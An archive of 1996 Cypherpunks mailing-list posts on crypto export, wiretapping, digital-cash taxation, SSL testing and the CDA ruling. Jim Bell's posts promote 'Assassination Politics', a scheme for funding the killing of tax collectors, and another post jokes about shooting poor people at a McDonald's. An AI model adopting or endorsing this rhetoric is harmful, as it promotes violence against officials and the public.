(CompuSource reserves the right to change offers and methods of working 
without prior notice.)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzHb6qsAAAEEANeS5gaRlnPTnxvGNB/TUQyOlEli+EYyWZIrpadIuSZgKBsP
RZIDlPohrgGudg59EZNlvQpWkdJIqOyal5UV9Dooz+iqMvwcVix6v6K8iwibM4Pq
US9YmTOKKzVR4ffkn1gzdp/IhXbCkFIIkEUB/3chYm1jYkQsZSUBO7R8HxhRAAUT
tB9Db21wdVNvdXJjZSA8c291cmNlQGlhY2Nlc3MuemE+iQCVAwUQMdvqrCUBO7R8
HxhRAQGSBAQAwDekrPCEc4SFCuUMjuiloztaxR8/TLnQLTM7TlYIReLss10a3SYT
8YmMGIgnv5MsuIVP0gD8ZWPhxHtuM//fCT+4hSHJ0aJ0DOqkE8o5JGCauxLdwWez
MI5nbwasVgX5Ah/nEuTLfBF0cK4ifSOZB7VrmxASiaDy5EWqA/qCrtA=
=RuFP
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 31 Jul 1996 02:22:38 +0800
To: "'source@iaccess.za>
Subject: RE: Implementing KEA in Software
Message-ID: <01BB7DEF.366A1C00@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	source@iaccess.za[SMTP:source@iaccess.za]
Sent: 	Tuesday, July 30, 1996 2:37 AM
To: 	coderpunks@toad.com
Subject: 	Re: Implementing KEA in Software

To make this quite clear...I am not anti any geographical space that has a
name such as USA or any other name, as it is an inanimate substance.

You would ONLY be right about classification and restrictions *IF* the
information came from the USA, from a "restricted" or "classified" person,
otherwise you are wrong. Remember not all info comes from the USA.

No, but the KEA algorithms, the Skipjack algorithm used in the fortezza, 
etc.  Were developed inthe US, by the NSA,   with US dollars from taxpayers 
(for better or worse).

THIS info does happen to be form, by and of the NSA, sorry.

You are being childish.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 31 Jul 1996 03:18:56 +0800
To: source@iaccess.za
Subject: Re: Netscape Security Lies
In-Reply-To: <199607300939.CAA24753@toad.com>
Message-ID: <199607301530.IAA16533@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


source@iaccess.za writes:
> 
> We have just tested Netscape's security page and it seems they are either lying
> or have a major bug.
> 
> All you have to do to confirm this is to go to their page
> http://home.netscape.com/newsref/ref/netscape-security.html#test
> and click on the link under the heading Testing the Secure Server link
> "Here is a secure server you can visit.

I checked this out with baited breath, hoping to find a juicy
Netscape security hole as promised.  Unfortunately, all it is
is a mis-configured httpd server at rsa.com.  It should be
doing SSL but it's not.  A bummer, but probably not a lie and
certainly not a major bug.

> We decided to test further and found that the RSA secure server is only SSL 2 
> and SSL 3 which is what Netscape seems to be touting to the resting of the 
> world saying they have it NOW. Later, if not much later seems far more
> realistic. 

Try ssl3.netscape.com:443.  It's doing ssl3.

> I do not like being lied to, mislead or steam rolled by, how about
> you?

Not at all.  So quit doing it.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 31 Jul 1996 03:01:43 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Denning vs. Gilmore
In-Reply-To: <199607300322.UAA02252@mail.pacifier.com>
Message-ID: <199607301534.IAA03899@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > In some cases, that access must be surreptitious. 
> 
> But some of us consider such access to be unconstitutional, however "useful" 
> you may believe it to be.  In the past, the government has had the extreme 
> luxury of not being forced to convince the public of its "right" to wiretap. 
>
> Now, the advance of technology is forcing the question of such approval to 
> be answered, and the Denning-types are getting really worried that the 
> public isn't going to give that approval.  Tough!

While I may not necessarily agree that government has never been forced
to convince the public (some courts, acting as an agent of the public on
Constitutional issues, have ruled that wire taps should only be allowed
on the narrowest of basis to avoid breach of privacy), I do feel that
you have stated the most important point in terms of privacy violations.

It is clear that law enforcement has used intercepts much more than it
has been legally allowed.  Afterall, if they truly ask a judge (and they
even have stream lined courts just for this purpose) for every intercept
needed, then they do not have to worry about capacity or escrowed length
limits, right?

The point is that they ARE exceeding the official count of intercepts,
and they ARE trying to intercept without warrants.  That is why they are
asking for all of this.

In the face of this overwhelming evidence of abuse, I absolutely refuse
to give my keys to anyone without my personal review of the "evidence"
against me.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 30 Jul 1996 13:32:01 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: Re: e$: The Demographic "Transaction" (was Re: Schelling  Points...)
Message-ID: <1.5.4.32.19960730023643.002e900c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 19:37 29/07/96 +-200, Bart  Croughs wrote:

>The only effect of more stringent enforcement of anti
child-labor legislation is to harm the children involved. You may
think that the millions of families in Third World countries who
are too poor to provide for their children, will be magically
become rich enough to send their children to school once the anti
child-labor legislation will be enforced. <

This is getting off-topic,  if there is such a thing on this
list, but anyway... of course legislation alone is no good.
Typically, it is accompanied by efforts to provide alternate
livelihood to the older children or parents, free schooling, etc.

>	Child labour in the West didn't stop because of anti
child-labour laws; it stopped the moment the people became rich
enough to provide for their children, thanks to the capitalist
revolution in the 18th & 19th century. The same path will have to
be followed by the Third World countries today.<

Take your point,  though we may be talking chicken and egg here.
If you have lots of children, you and your children never will
become rich enough to change...

>Instead of posting to the net to increase outrage about the
violations of harmful child labour laws, you better begin posting
to the net to increase outrage about the socialist governments in
the Third World that keep their populations in poverty.<

Socialism as an economic philosophy is fairly discredited, and is
on its way out without my expressions of outrage needed to help
it along. Yet, the capitalist economy seems to be no better at
dealing with extreme poverty.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 31 Jul 1996 03:45:27 +0800
To: ichudov@algebra.com
Subject: Re: Taxes in the digicash world
In-Reply-To: <199607301117.GAA06799@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960730081809.26670B-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 30 Jul 1996 ichudov@algebra.com asked:

> ...how can the government TECHNICALLY collect taxes...when
> transfers of money are protected by strong crypto[?]

Igor answered his own question with regard to trying to tax  
digital money transactions at the bank level:

> Of course these banks may be offshore, and then such collection
> becomes problemstic.

He then suggested:
 
> Another alternative that I see is property taxes and poll taxes
> or taxes on some commodities such as oil.  But incomes seem to
> be hard to track.

Under a totally anonymous digital money scheme, directly tracking 
income becomes effectively impossible.  One solution that is used
in countries with historically low rates of tax compliance 
(e.g., France) is to base taxation on apparent wealth.  Not very 
efficient.  

Commodity taxes--especially taxes on only one or a few 
commodities--create market distortions as people seek to minimize 
their tax load by commodity substitution (e.g., natural gas or
ethenol for oil) or the use of black market sources (e.g., 
bootleg cigarettes.)

Poll taxes are universally hated and trivially avoided.  Their
evil twin, head taxes, are likewise hated and only enforceable
with mandatory universal identification.  (In two months, the
Mafia will be selling perfect forgeries supplied by the ChiComs.)

If I were the government, I'd tax realty as my primary or only
source of income.  It *appears* "progressive" so it appeals to
the lower class, but it is passed along to everyone in the form
of higher commodity prices and rents.  Realty can't be picked up 
and moved to another jurisdiction like personal property or
people, so it is easier to hold as a tax hostage by government.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Kline <dkline@well.com>
Date: Wed, 31 Jul 1996 04:05:38 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Dry Under the Waterfall
In-Reply-To: <2.2.32.19960730135447.0085571c@panix.com>
Message-ID: <Pine.SOL.3.91.960730085319.25477C-100000@well>
MIME-Version: 1.0
Content-Type: text/plain



You make some very good points about those too unsocialized, too 
unmotivated, too "declasse," as it were, to even enter the age of reading 
that began 500 years ago.

A question though: What about the 3 million hard-working, reading, 
middle-class folks who have been downsized into oblivion the last three 
years alone? What about the tens of millions of readers who had the skills
needed for the industrial age, but not for the information age?

Well, change means pain, and we'll get to the millennium one way or 
another. But we can do it the hard way or the easy way. The hard way 
means severe social dislocation, possibly even threats to democracy. The 
easy way seems the smarter approach -- no serious effort at reforming 
education and at skills retraining has ever been undertaken, and it seems 
a better use of our tax dollars than most of the crap it's spent on now.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 03:57:03 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
Message-ID: <199607301610.JAA04666@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:17 AM 7/30/96 -0500, Igor Chudov @ home wrote:
>Hi
>
>Suppose that digital cash becomes easy enough to use and becomes the
>mainstream medium in most [or at least many] economic transactions.
>
>The question is, how can the government TECHNICALLY collect taxes?
>I do not mean to start `libertarianism vs. socialism' discussion, I
>am more interested in the technical aspects of tax collection when
>transfers of money are protected by strong crypto..
>
>Let's say, maybe this tax would work: every time someone verifies that
>a piece of digital cash is valid, s/he has to pay the government a little
>percentage of the amount. Since digital banks are easier to control than
>other participants of the market, this kind of tax legislation is easier to
>enforce.

If, for every $1 somebody paid in taxes, he instead (or, in addition to) 
paid 10 cents to a fund to eliminate the tax collectors, at the end of that 
year he wouldn't be paying any taxes anymore.  That's why AP will work so well.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 31 Jul 1996 05:27:41 +0800
To: se7en <se7en@dis.org>
Subject: Re: NBC
In-Reply-To: <Pine.BSI.3.91.960730040209.17414A-100000@kizmiaz.dis.org>
Message-ID: <v03007801ae23ea7efa82@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>So how was the tv hacker presentation? I was one interveiwed and was in
>las vegas at defcon when it aired. I never saw the final product.
>
>se7en

About what I expected: "We're only exploring, we're not trying to
damage anything, etc." -- I didn't tape it so I can't give you
more than that impression.

Since I've been in this business for well over thirty years and,
about ten years ago, had one of my systems infested by Kevin
Mitnick, I'm not particularly sympathetic to the "we're just
trying to learn" mentality -- if you want to learn, buy a PC
and a Linux CD, write some code, give it away, and make a real
contribution to the community.

Martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 31 Jul 1996 05:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: Denning vs. Gilmore
Message-ID: <v03007805ae23eec15086@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>Today, Monday, July 29, Dorothy Denning begins her debate vs. John Gilmore
>over The Absolute Right to Privacy on Wired Online's Brain Tennis site. Do
>citizens of the world have an "unalienable right" to privacy - or are there
>reasons why governments ought to have access to our communications? This
>debate will run daily through August 7. Follow along at
>http://www.wired.com/braintennis/
>
I especially like Dr. Denning's quote:

>An encrypted global information infrastructure is without precedent in
>world history. It allows individuals and groups, anywhere and any time,
>to communicate securely and with total privacy across time and space.

Now _there_ is a goal to shoot for!


Minor comments:

First, a historical question:
	What percentage of telegraph traffic was encrypted in the 1910s?

A global information infrastructure (encrypted or not) is without precedent in world history, is it not?

I noticed that she said "allows", not "would allow". That contradicts
<<I'm not ready to accept "the cat is out of the bag.">>, doesn't it?

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 31 Jul 1996 01:57:53 +0800
To: cypherpunks@toad.com
Subject: Dry Under the Waterfall
Message-ID: <2.2.32.19960730135447.0085571c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


If I read *one* more bit of blather about the "information haves and have
nots" I am going to take my Streetsweeper down to my local McDonalds and
decrease the imbalance between these two groups by reducing the quantity of
the latter.  It would work just as well as any other solution.

The latest blather was in a parting shot in David Kline's last "Market
Forces" column in Hot Wired (www.wired.com).

"How can we assure that the tired, poor, huddled masses yearning to breathe
free, the wretched refuse of your teeming shore, the homeless, and
tempest-tossed get onto the Net"? (My formulation -- not his.)

The answer is we can't.  I have been online every day since 1987 or so.
Since that time I have begged, pleaded, cajoled, and threatened friends,
relatives, casual acquaintances, and total strangers to get them on line.
(We are talking here about people who have the cash to easily get wired if
they care to.)  Sometimes it has worked.  Mostly it has not.  It has gotten
easier to dragoon people onto the net recently but it is still hard.  I have
taken to telling people who ask me for help setting up their computer
systems that I will only help them on the condition that they obtain an ISP
account and use it.

The usual reason for resistance (beyond a reluctance to spend money) is a
failure to appreciate the value of the online experience.  No matter how
much I plead, many people have not (in the past) been able to see what this
all was good for.  This was particularly true when online computing was a
text-only experience.  Non-readers have a problem with text.

Now, even though the net is more graphical, it still lacks appeal for 95% of
the population (or at least enough appeal to get them on to it).  Even
though we may know that many people could improve their lives and economic
standing by learning to compute and telecommunicate, they don't *know* it
and so they are not wired.  Par example -- an auto mechanic of my
acquaintance was assigned to the office where he worked to handle advanced
paper shuffling involving auto parts.  He started to use an XT to track
parts and got to like it.  He asked me for some advice and over the years
bought an XT and other machines until he now has two desktops and a laptop
networked at home.  He's on the net as well.  At work, he has become a
supervisor in part because he can use computers.  The original purchase of a
computer has been paid for many times over by increased income.

There is nothing new about this, of course.  Even without computers, it is
obvious that someone who can read and write can average more money in the
modern world than one who can't.  And yet many people refuse to learn to be
good readers.  Because they don't read, they also know less.  Sans books and
periodicals, you simply can't encounter a critical mass of ideas and
information sufficient to achieve a self-sustaining intellectual life and
the flexible abilities necessary to survive in the current economy.  For
readers, the modern economy is a piece of cake.  And reading is not a
"certification" it's a skill.  You can get it with minor help.  It takes no
money and it can't be denied to you by a racist society.  Without so much as
a high school diploma, a good reader can succeed easily in today's America
(credential-happy Europeans have to fend for themselves).

Do you doubt this.  Assume you are a good reader without credentials.  1)
Learn to type.  (Used manual portables cost $12 at the Sally Army.)  3)  Get
a temp job that requires typing.  (Lie about your high school diploma.
Since you are well dressed from the same Sally Army where you got your
typewriter and have excellent communication skills -- these things are under
your control -- it shouldn't be much trouble.)  2) Learn to word process.
(Commodore 64's and used b/w TV sets cost $25 or less at flea markets.
Running the tutorials at hourly PC rental places are pretty cheap as well.
If you are a good typist, temp agencies will cross train you on PCs so they
can rent your rear end out for more dough.) 4)  Become an experienced
(permanent) temp word processor on the night shift in the financial district
of NYC making $22.50-$27.00/hour.  ($18.00/hour -- days.)  5)  Then become a
(contract) tech writer and start to make more money.  

All that is necessary for the above is the ability to read and write
fluently which is open to all persons of normal intelligence.  But most
choose not to learn those skills (which is why they pay so much in today's
market).  Similarly, most people are not interested in learning to compute
and in getting wired. Instead they stand around an bitch about how their
incomes are flat and they can't find work when they get laid off at 50.
Hardly surprising.  They've already established that they're dead from the
neck up.  I wouldn't hire them, why should anyone else.

This is the phenomenon of the modern world.  So many people one meets are
pig ignorant.  They are sitting under a waterfall of knowledge cascading
over them in a volume unprecedented in human history and yet they contrive
not to get wet.

Meanwhile, we are told that the information have-nots are being denied
access to the wonders of the information age.  I'm very sorry but they have
already rejected the wonders of the last information age that started 541
years ago with the publication of the Mazarin Bible.  People who can't even
bother to read and write will not be helped by our cash and Al Gore's
preaching.  You can lead a horse to water but you can't make him think.

DCF

"So Louis Freeh wants expanded wiretap authority.  What's the matter?  Craig
Livingstone short of reading material"?
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 06:21:03 +0800
To: cypherpunks@toad.com
Subject: You know it's getting late when...
Message-ID: <199607301743.KAA10519@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Last night on (as I recall) the CBS evening news, I heard a comment by a 
reporter that further reinforces my opinion that "they just don't get it."  
The reporter was talking about terrorism versus the amount of "security" 
applied, and he was pointing out that Americans  know the bombing had 
occurred in Saudi Arabia "despite the fact that political opposition there 
is practically illegal."   (fairly close quote)

Huh?  "despite the fact that political opposition there is practically 
illegal"?    "Despite"?  Suggesting, apparently, that the more oppressive 
the rule, the LESS likely violent opposition is expected to be?

I suggest a rewording:  "the bombing in Saudi Arabia occurred BECAUSE OF the 
fact that political opposition there is practically illegal."

Ostensibly, one of the reasons for having a free and fair political system 
is so people will not be inclined to throw bombs and plot violent 
revolution.  Grandly ignoring this, that reporter seems to take the 
diametrically opposite tack:  A totalitarian government can best avoid 
bombings and violence.

Where do these people learn their political theory?

One frequent line among reporters is that terrorism used to always be 
something that occurred elsewhere, not in America.  Yet another thing that 
"never" seemed to happen is when nominally patriotic, even conservative 
people talk of throwing out the government due to oppression.  (Such an 
activity is thought of as primarily the function of the young, usually the 
liberal, as in the civil rights and anti-war demonstrations of the 1960's.)

I wonder when it will occur to these reporters that there may actually be a 
connection there somewhere!

If anyone out there still doubts that the time for my "Assassination 
Politics" idea will never come, I claim that it's later than you think.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 11:47:22 +0800
To: cypherpunks@toad.com
Subject: Re: "Soft Targets" as Schelling Points
Message-ID: <ae22ab9f010210048ed4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 PM 7/29/96, eli+@gs160.sp.cs.cmu.edu wrote:
>Tim May writes:
>>The connection should be clear, but in case it is not: many soft targets
>>are Schelling points for terrorist actions.
>
>I see no coordination problem here.  Schelling points are a useful
>concept when you have several actors, each of whom benefits from
>making the same choice as the others.  Here, I think you want to say
>"soft targets are easy to attack".

There are _many_ "soft targets," of course. Millions, in fact. But some are
"more likely" than others to be hit, a la Schelling points.

Schelling points need not involve "coordination" between actors, though
Schelling points provide one means of coordination without communication
(e.g., where does each think a meeting will occur).

Schelling points are like "The Match Game" (an old t.v. show largely
written by one of the main contributors to "Mad Magazine").  Namely, "Name
a place likely to be attacked by terrorists."

Coordination is not the issue. Rather, the Olympics was (obviously) a
likely target, for a variety of reasons.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 06:56:01 +0800
To: cypherpunks@toad.com
Subject: VISA Travel Money
Message-ID: <199607301755.KAA10273@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Happened to browse the VISA Web site last evening to read about
the new microprocessor-based VISA Cash Cards that are being
accepted in lieu of small change at the Olympics in Atlanta.

While there, I noticed a new product that VISA is about to
introduce.  Called "VISA Travel Money", it is a pre-paid card
with a user-selected PIN which one can simply purchase at a
participating financial institution, just like Travelers Checks.
One can then use it at any of the 250,000 ATMs in 89 countries
until the amount one paid for it has been extracted, after which,
one presumedly tosses it.

Since the card is pre-paid, and does not involve the extension of
credit, I would think that a "nym" would have no difficulty in
purchasing one.  Seems like a convenient way to keep moderate
amounts of cash in a form which cannot be easily stolen, nor
perused by the Feds.

I wonder if an SSN is required at the time of purchase?

In any case, http://www.visa.com/ and a few clicks will get you
all the available information.

VISA Travel Money: No Horseman should leave home without it! :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 12:15:12 +0800
To: cypherpunks@toad.com
Subject: RE: A Libertine Question
Message-ID: <ae22ace002021004da1c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 PM 7/29/96, jbugden@smtplink.alis.ca wrote:
>I find it funny that I'm considered Conservative by most people who know me.
>Your opinion may vary. ;-)

I don't find it surprising (a different word from "funny") that you are a
kind of "conservative." Many folks calling themselves conservatives
actually want various kinds of laws, safety nets, social order, etc. (Many
"conservative farmers" want government price guarantees, for example.)

>tcmay@got.net wrote:
>>Who takes responsibility when people fail to save enough of their
>>paycheck to last them through the month? Who takes responsibility when
>>people drink too much, miss work, and are fired? And so on.
>
>One common thread in many of these discussions is the ease with which moral
>judgements are made about the situation: "fail to save", "drink too much".

This is quibbling. Use whatever other word or weasel phrase for "fail to
save" and "drink too much." Common euphemisms are: "became a victim of
ethanol addiction," "lacked personal financial skills," etc.

My point was an obvious one, clearly made, which I won't repeat here.

>I know the social psychology explanation that people who view the world as
>ordered attach these types of judgements to situations which violate their
>ordered view of the world. "She was just asking for it dressed like that..."

This is fatuous nonsense. I made no comment even remotely similar to this.
(In fact, in my view, a woman can wear a tiny string bikini and, if
attacked, blow away her attacker; though the bikini may make concealed
carry a bit harder.)

>However, now I'm puzzled. From what I've read of Tim May, he does not hold such
>an orderly view of the world. The "rules" of existence may prove to be
>deterministic, but the results are chaotic. So Tim, where are these moral
>judgments coming from?

The likely reason you are confused is that you set up a straw man, found it
conflicted with other things I have argued, and now wish me to "explain."


>Think of how many of our laws are being enacted that tacitly make being
>poor or
>indigent a crime. Curfews being a recently discussed example. If the
>equation is
>one of economics, then "who takes care of" people does indeed enter the
>equation. I suggest that it is more economical to provide for a minimum quality
>of life- if only as a form of insurance for myself. Think: Rawls.

I have strongly argued against curfews, as I don't want cops telling my
15-year-old child when she or he can and can't be on public roads.

As to "insurance," be my guest. That is, you and others are perfectly able
to form insurance pools, old age retirement funds, etc. These are usually
called "pension plans."

However, please don't hold a gun to my head and demand that I contribute to
a plan, especially one which is a Ponzi scheme like Social Security (SS is
not self-funding, and "IOUs" are being placed in the pot for the future, as
is well-known.)

Sounds fair to me.

>The alternative is to have garbage collectors to "take care of" those that fall
>behind. Think: Soylent Green.

A bad form of argument, citing bad SF movies to prove your points.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 31 Jul 1996 02:33:07 +0800
To: cypherpunks@toad.com
Subject: New decency act court case
Message-ID: <96Jul30.110635edt.20484@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain



>From the Nando Times.  Formatted to my screen... Sorry about that.



U.S. JUDGES DECLARE INTERNET DECENCY LAW UNCONSTITUTIONAL
--------------------------------------------------------------------------------------------------------------------

Copyright (c)1996 Nando.net
Copyright (c)1996 Reuter Information Service

NEW YORK (Jul 29, 1996 11:35 p.m. EDT) - Federal judges Monday blocked enforcement of a new law aimed at regulating
indecent material on the Internet because it bans constitutionally protected speech between adults.

In its ruling, judges from the Southern District of New York granted an injunction sought by the editor of The
American Reporter, an on-line newspaper, who argued that the law was too broad.

The decision followed a ruling in June by a Philadelphia panel that also found a key part of the law to be
unconstitutional. That ruling went farther than the one issued Monday by finding the law too vague as well as too
broad.

The Computer Decency Act of 1996 was passed overwhelmingly by Congress as part of the broader Telecommunications Act
of 1996 and was signed by President Clinton on February 8.

Because lawmakers expected immediate constitutional challenges they included provisions allowing swift appeals first
through special panels and then directly to the U.S. Supreme Court.

A key portion of the law, known as 223(d), makes it a crime to make indecent material available on computer systems
that are accessible to children. The law provides for prison terms of two years and an $250,000 fine if indecent
material is transmitted to minors.

The New York panel said government attempts to limit offensive material to children would also place unacceptable
restrictions on adults.

It said the section not only regulates how pornographic material is sold and advertized, but "how private
individuals who choose to exchange certain constitutionally protected communications with one another can do so.

"The question presented is whether our Constitution tolerates this level of governmental intrusion into how adults
speak to one another ... We reach the inescapable conclusion that 223(d) will serve to chill protected speech."

The panel, which comprised Jose Cabranes of the Second Circuit Court of Appeals and District Judges Leonard Sand and
Denise Cote, discussed software designed to enable parents to limit children's exposure to inappropriate material.

"Indecent content on the Internet ordinarily does not assault a user without warning: a child cannot gain access to
Internet content with the touch of a remote control and while accidental viewing of indecent content is possible,
there is no evidence in this record to suggest that it is likely," the panel wrote.

It said that while parents can take steps to restrict access by their children, content providers have no way of
guaranteeing that indecent material will not reach a minor.

The judges said that the only way a content provider would comply with the section would be to refrain from sending
out the objectionable material.

"Because adults would lack means of engaging in constitutionally protected indecent communications over the Internet
without fear of criminal liability, the statute would unquestionably be unconstitutional," the panel said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Wed, 31 Jul 1996 06:32:58 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Let's Say "No!" to Single, World Versions of Software
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960730180841Z-20221@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net
>
>Such an international deal would almost certainly mean that even
>fully-domestic versions of software would have to be GAKked.
>
>Hence the need for us to pressure Netscape, Microsoft, Qualcomm, Novell,
>etc. *not* to play ball on this. This would then "marginalize" the European
>and Asian customers of a special "NSA-readable" version of their products,
>and would likely derail the whole thing.
..........................................................


Deja-vu.   Not to take away from the importance of this subject or any
of the fine points which Tim has made, but it looks like it's time for
the CPunk Annual August GAK Discussion on back-door deals, the NSA, and
the Big Software Companies.   

 :>)

   ..
>Blanc
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jul 1996 06:54:48 +0800
To: cypherpunks@toad.com
Subject: Paranoid Musings
Message-ID: <199607301811.LAA28373@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sometimes paranoia strikes.  Since these musings are crypto related, I
thought I would share them.

(1) Now everyone knows that 40 bit RC4 is weak, but just how weak is it? 
We know that a university CS student can break one message in a week using
the universities farm of workstations.  But, our foremost reputation agency
for crypto strength, the ITAR, allows systems with RC4-40 to be exported. 
What does this mean?

I combine the above with Whit Diffie's observation that, while crypto users
are interested in the security of *each* message, organizations which
monitor communications want to read *every* message.  A TLA interested in
monitoring communications would need to crack RC4-40 much faster than
1/week.

Now expensive specialized cracking equipment can certainly speed up the
process, but there may be a better way.  If cryptanalysis of RC4 yields
techniques which make the process much easier, then it is the ideal cypher
to certify for export.

The paranoid conclusion is that there is a significant weakness in RC4.



(2) What did Microsoft give up to export its crypto API?

Well, if you were a TLA, what would you want.  I think I would want an
agreement to be able to insert my own code in that vendor's products.  Then
I would be able to have widely distributed Trojan horses signed by the
vendor.  I would have the opportunity to significantly weaken standardized
crypto systems installed world wide.


Conspiracy theorists, start your mailers.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George Kuzmowycz" <gkuzmo@ix.netcom.com>
Date: Wed, 31 Jul 1996 02:49:38 +0800
To: cypherpunks@toad.com
Subject: Privacy a thing of the past
Message-ID: <199607301527.IAA20885@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  No, it's not my opinion. The subject line is the title of a keynote 
session at the DCI Internet Expo in Boston on October 15-17. The talk 
is being given by a fellow named Jim Sterne, who is listed as 
president of something called "Target Marketing". I got the brochure 
for the show in this morning's mail. You can get further info at 
http://www.DCIexpo.com.

  The description of the talk begins with the intriguing line 
"Computing power allows us to stop treating people like numbers and 
go back to treating them like human beings -- individuals with 
specific likes, dislikes and points of view." But it ends with "Along 
the way, privacy will become a quaint sentiment." So I guess we treat 
people like human beings, but human beings whom we know everything 
about.

  Although this is a paid conference, they give out free tickets to 
the "expo". It's not clear whether the free ticket gets you into the 
keynotes, but that has usually been the case in the past. If you're 
in or near Boston on 10/17, you may want to share your views with Mr. 
Sterne.

        -gk-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: source@iaccess.za
Date: Tue, 30 Jul 1996 20:51:33 +0800
To: cypherpunks@toad.com
Subject: Netscape Security Lies
Message-ID: <199607300939.CAA24753@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We have just tested Netscape's security page and it seems they are either lying
or have a major bug.

All you have to do to confirm this is to go to their page
